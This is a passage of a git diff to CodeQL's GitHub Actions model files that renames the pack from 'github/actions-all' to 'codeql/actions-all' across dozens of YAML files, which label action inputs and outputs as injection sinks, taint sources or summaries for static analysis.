"input.source-url", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml b/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml index 412db371965c..646d54ac92ab 100644 --- a/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml +++ b/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["devorbitus/yq-action-output", "*", "input.cmd", "code-injection", "manual"] diff --git a/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml index 4bc7e2518080..f316799fa4a7 100644 --- a/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml +++ b/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/docker_build-push-action.model.yml b/ql/lib/ext/manual/docker_build-push-action.model.yml index 845ae1770ed4..116c231c30a4 100644 --- a/ql/lib/ext/manual/docker_build-push-action.model.yml +++ b/ql/lib/ext/manual/docker_build-push-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["docker/build-push-action", "*", "input.context", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml b/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml index 226a151dabab..a60f1cc9fb1a 100644 --- a/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml +++ b/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["dsfx3d/action-extract-unique-matches", "*", "input.text", "output.matches", "taint", "manual"] diff --git a/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml b/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml index 8cdcabb2c117..eafb7d1fc3aa 100644 --- a/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml +++ b/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["eficode/resolve-pr-refs", "*", "output.head_ref", "branch", "manual"] diff --git a/ql/lib/ext/manual/endbug_latest-tag.model.yml b/ql/lib/ext/manual/endbug_latest-tag.model.yml index 780acdb98fff..b4aab55179b3 100644 --- a/ql/lib/ext/manual/endbug_latest-tag.model.yml +++ b/ql/lib/ext/manual/endbug_latest-tag.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["endbug/latest-tag", "*", "input.ref", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/expo_expo-github-action.model.yml b/ql/lib/ext/manual/expo_expo-github-action.model.yml index 038f1639d3cf..3b7b4aea7133 100644 --- a/ql/lib/ext/manual/expo_expo-github-action.model.yml +++ b/ql/lib/ext/manual/expo_expo-github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["expo/expo-github-action", "*", "input.command", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml index d948bda8bf43..b09bec4a1d42 100644 --- a/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml +++ b/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/frabert_replace-string-action.model.yml b/ql/lib/ext/manual/frabert_replace-string-action.model.yml index ed9eeb6b2520..cb71f958365e 100644 --- a/ql/lib/ext/manual/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/manual/frabert_replace-string-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint", "manual"] diff --git a/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml index f6441133c7af..c4f8a3efe3ea 100644 --- a/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "text", "manual"] diff --git a/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml index 357ffc1c94a8..aa9dd5096610 100644 --- a/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml +++ b/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/game-ci_unity-builder.model.yml b/ql/lib/ext/manual/game-ci_unity-builder.model.yml index 0288103fd0ad..767c77310e8d 100644 --- a/ql/lib/ext/manual/game-ci_unity-builder.model.yml +++ b/ql/lib/ext/manual/game-ci_unity-builder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml b/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml index 05dca2f8262a..6df70ae927a6 100644 --- a/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml index 123dabe450e9..3f43f195f68f 100644 --- a/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml +++ b/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/manual/getsentry_action-release.model.yml b/ql/lib/ext/manual/getsentry_action-release.model.yml index cb127c7ff467..3c63d7b845f1 100644 --- a/ql/lib/ext/manual/getsentry_action-release.model.yml +++ b/ql/lib/ext/manual/getsentry_action-release.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["getsentry/action-release", "*", "input.version", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/manual/github_codeql-action.model.yml b/ql/lib/ext/manual/github_codeql-action.model.yml index 79936a515206..6db033ebd9fd 100644 --- a/ql/lib/ext/manual/github_codeql-action.model.yml +++ b/ql/lib/ext/manual/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint", "manual"] diff --git a/ql/lib/ext/manual/go-semantic-release_action.model.yml b/ql/lib/ext/manual/go-semantic-release_action.model.yml index 9bc26169b27b..a376aefd6f60 100644 --- a/ql/lib/ext/manual/go-semantic-release_action.model.yml +++ b/ql/lib/ext/manual/go-semantic-release_action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["go-semantic-release/action", "*", "input.bin", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml b/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml index 8aa19f944523..51ca0af21c3d 100644 --- a/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml +++ b/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["golangci/golangci-lint-action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml index dc86b19a69b1..28d118e6b611 100644 --- a/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml +++ b/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml index bc9f2aad14c1..7e045f8380a4 100644 --- a/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml +++ b/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml index f288c615a351..2a6d3fac1df7 100644 --- a/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml +++ b/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["gotson/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"] diff --git a/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml index c3604795c256..a3c590ec473e 100644 --- a/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml +++ b/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/gradle_gradle-build-action.model.yml b/ql/lib/ext/manual/gradle_gradle-build-action.model.yml index dfcc204c2bac..98a61516c600 100644 --- a/ql/lib/ext/manual/gradle_gradle-build-action.model.yml +++ b/ql/lib/ext/manual/gradle_gradle-build-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint", "manual"] diff --git a/ql/lib/ext/manual/haya14busa_action-cond.model.yml b/ql/lib/ext/manual/haya14busa_action-cond.model.yml index c8d5e822c02c..17aaecf80c56 100644 --- a/ql/lib/ext/manual/haya14busa_action-cond.model.yml +++ b/ql/lib/ext/manual/haya14busa_action-cond.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/manual/hexlet_project-action.model.yml b/ql/lib/ext/manual/hexlet_project-action.model.yml index 5c7ec5f957fe..60a68ed2f8d2 100644 --- a/ql/lib/ext/manual/hexlet_project-action.model.yml +++ b/ql/lib/ext/manual/hexlet_project-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint", "manual"] diff --git a/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml index 5384571801c6..3c0820b6878c 100644 --- a/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml +++ b/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/ilammy_setup-nasm.model.yml b/ql/lib/ext/manual/ilammy_setup-nasm.model.yml index ba5de742701c..99146ff21be0 100644 --- a/ql/lib/ext/manual/ilammy_setup-nasm.model.yml +++ b/ql/lib/ext/manual/ilammy_setup-nasm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ilammy/setup-nasm", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml b/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml index ce0fb5734932..7790454a9349 100644 --- a/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml +++ b/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["imjohnbo/issue-bot", "*", "input.body", "code-injection", "manual"] diff --git a/ql/lib/ext/manual/iterative_setup-cml.model.yml b/ql/lib/ext/manual/iterative_setup-cml.model.yml index 8f53dfeb118a..e3cea2e555a4 100644 --- a/ql/lib/ext/manual/iterative_setup-cml.model.yml +++ b/ql/lib/ext/manual/iterative_setup-cml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["iterative/setup-cml", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/iterative_setup-dvc.model.yml b/ql/lib/ext/manual/iterative_setup-dvc.model.yml index 6d7d368c7810..c3346d689456 100644 --- a/ql/lib/ext/manual/iterative_setup-dvc.model.yml +++ b/ql/lib/ext/manual/iterative_setup-dvc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["iterative/setup-dvc", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml index 9b0f078d8742..2e2c0cff0ef8 100644 --- a/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml +++ b/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml b/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml index dabec4e8d215..97b631cdfcd6 100644 --- a/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["jitterbit/get-changed-files", "*", "output.all", "filename", "manual"] diff --git a/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml index 2db040a0709a..c6d3c5cfb48e 100644 --- a/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml +++ b/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/jsdaniell_create-json.model.yml b/ql/lib/ext/manual/jsdaniell_create-json.model.yml index e8d4aa790a66..697189cfbd01 100644 --- a/ql/lib/ext/manual/jsdaniell_create-json.model.yml +++ b/ql/lib/ext/manual/jsdaniell_create-json.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint", "manual"] diff --git a/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml b/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml index 3a5cf8c8be2d..7f82a8b74f5d 100644 --- a/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml +++ b/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/jsmith/changes-since-last-tag diff --git a/ql/lib/ext/manual/jurplel_install-qt-action.model.yml b/ql/lib/ext/manual/jurplel_install-qt-action.model.yml index 8fde3e0c110f..95bd63fb22e1 100644 --- a/ql/lib/ext/manual/jurplel_install-qt-action.model.yml +++ b/ql/lib/ext/manual/jurplel_install-qt-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jurplel/install-qt-action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml index e9b04f2806f6..1fc8b037530a 100644 --- a/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint", "manual"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml b/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml index 3e646e4482f2..40b8b093957d 100644 --- a/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml +++ b/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["kaisugi/action-regex-match", "*", "input.text", "output.*", "taint", "manual"] diff --git a/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml b/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml index 0d4df5ef6b1d..0c3cf006d3eb 100644 --- a/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml +++ b/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/karpikpl/list-changed-files-action diff --git a/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml index 386baaf2f95a..e61008f160ed 100644 --- a/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml +++ b/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] diff --git a/ql/lib/ext/manual/knu_changed-files.model.yml b/ql/lib/ext/manual/knu_changed-files.model.yml index 5e7374dabad4..96e4e8f02f5c 100644 --- a/ql/lib/ext/manual/knu_changed-files.model.yml +++ b/ql/lib/ext/manual/knu_changed-files.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/knu/changed-files diff --git a/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml index d9c7d33c86f4..feff62d16c07 100644 --- a/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml +++ b/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml b/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml index 016a8ebc8cfa..b74e721e577f 100644 --- a/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml +++ b/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml index d358aa238931..d59a122a53ff 100644 --- a/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml +++ b/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml b/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml index a437dc2c4f29..8e108765b407 100644 --- a/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml +++ b/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["lots0logs/gh-action-get-changed-files", "*", "output.all", "PR changed files", "manual"] diff --git a/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml index f37bcbd62973..6f66e6cf867e 100644 --- a/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml +++ b/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml b/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml index c7474549fcb5..acdc250e3535 100644 --- a/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml +++ b/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["luizfelipelaviola/parse-plain-dotenv", "*", "input.data", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml index 05acda9aac9d..69298631c6e2 100644 --- a/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/manual/magefile_mage-action.model.yml b/ql/lib/ext/manual/magefile_mage-action.model.yml index 4b0c810d2304..85631268af72 100644 --- a/ql/lib/ext/manual/magefile_mage-action.model.yml +++ b/ql/lib/ext/manual/magefile_mage-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["magefile/mage-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/maierj_fastlane-action.model.yml b/ql/lib/ext/manual/maierj_fastlane-action.model.yml index acdf3ead4a41..18dbcab6f539 100644 --- a/ql/lib/ext/manual/maierj_fastlane-action.model.yml +++ b/ql/lib/ext/manual/maierj_fastlane-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["maierj/fastlane-action", "*", "input.lane", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml index b138d59c57ef..5c3b4b82bc22 100644 --- a/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml +++ b/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/marocchino_on_artifact.model.yml b/ql/lib/ext/manual/marocchino_on_artifact.model.yml index 63b236f32add..d86870f2f152 100644 --- a/ql/lib/ext/manual/marocchino_on_artifact.model.yml +++ b/ql/lib/ext/manual/marocchino_on_artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["marocchino/on_artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml b/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml index 9d0ecf04c6b8..06b1f3afd5d6 100644 --- a/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml +++ b/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/martinhaintz/ga-file-list diff --git a/ql/lib/ext/manual/mattdavis0351_actions.model.yml b/ql/lib/ext/manual/mattdavis0351_actions.model.yml index 0c6debc5d5e4..1d0e33bb277d 100644 --- a/ql/lib/ext/manual/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/manual/mattdavis0351_actions.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint", "manual"] - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint", "manual"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml index b72bd69e6255..f08bf9ac6e0d 100644 --- a/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml +++ b/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml index fec2376377e0..4e0800281d20 100644 --- a/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml +++ b/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint", "manual"] diff --git a/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml b/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml index 3201ac370b48..4ea7e022cbdb 100644 --- a/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml +++ b/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/mikefarah_yq.model.yml b/ql/lib/ext/manual/mikefarah_yq.model.yml index 